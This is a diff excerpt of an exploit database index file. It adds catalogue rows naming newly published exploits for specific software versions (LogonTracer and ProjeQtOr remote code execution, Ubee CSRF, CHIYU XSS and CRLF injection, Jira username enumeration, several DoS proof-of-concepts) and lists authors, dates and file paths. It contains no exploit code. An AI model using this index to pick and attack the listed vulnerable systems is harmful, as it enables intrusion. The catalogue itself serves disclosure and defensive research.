 49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",2021-05-19,"Luis Martínez",dos,ios,
 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows,
 49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows,
+49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",2021-06-01,"Brian Rodriguez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11339,6 +11340,7 @@ id,file,description,date,author,type,platform,port
 49893,exploits/windows/local/49893.c++,"DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)",2021-05-21,"Paolo Stagno",local,windows,
 49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",2021-05-24,"Erick Galindo",local,windows,
 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows,
+49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44079,3 +44081,10 @@ id,file,description,date,author,type,platform,port
 49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",2021-05-28,"Ron Jost",webapps,php,
 49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",2021-05-28,"Ron Jost",webapps,php,
 49915,exploits/linux/webapps/49915.rb,"Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)",2021-05-28,"Jon Stratton",webapps,linux,
+49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",2021-06-01,g0ldm45k,webapps,multiple,
+49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,
+49920,exploits/hardware/webapps/49920.html,"Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)",2021-06-01,lated,webapps,hardware,
+49921,exploits/php/webapps/49921.txt,"WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated)",2021-06-01,"Bastijn Ouwendijk",webapps,php,
+49922,exploits/cgi/webapps/49922.txt,"CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)",2021-06-01,sirpedrotavares,webapps,cgi,
+49923,exploits/cgi/webapps/49923.txt,"CHIYU TCP/IP Converter devices - CRLF injection",2021-06-01,sirpedrotavares,webapps,cgi,
+49924,exploits/multiple/webapps/49924.py,"Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)",2021-06-01,"Mohammed Aloraimi",webapps,multiple,